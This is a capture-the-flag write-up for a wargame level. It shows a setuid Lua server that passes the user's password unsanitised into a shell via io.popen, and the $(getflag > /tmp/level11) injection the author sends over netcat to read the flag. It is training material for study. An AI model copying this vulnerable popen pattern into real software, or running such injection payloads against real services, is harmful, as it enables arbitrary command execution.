1.6 KiB
1.6 KiB
When arriving on level11 I notice a readable lua file.
ls -l
total 4
-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua
I open it to look at the content.
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))
function hash(pass)
prog = io.popen("echo "..pass.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local l, err = client:receive()
if not err then
print("trying " .. l)
local h = hash(l)
if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
client:send("Erf nope..\n");
else
client:send("Gz you dumb*\n")
end
end
client:close()
end
The hash was decoded via CrashStation and gives in sha1 NotSoEasy. This is therefore not the answer but it was necessary to try.
During the reading of the script we can see that port 5151 is open and we can therefore try to launch it with a netcat listening on it.
When it is listening it asks for a password.
nc localhost 5151
Password:
But the hash is calculated by executing a command echo $args | sha1sum (translated in shell).
We can therefore execute a command on this one but the result will not be displayed to us because not sent to the client, but we can launch it directly to redirect into a file.
nc localhost 5151
Password: $(getflag > /tmp/level11)
Erf nope...
cat /tmp/level11
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s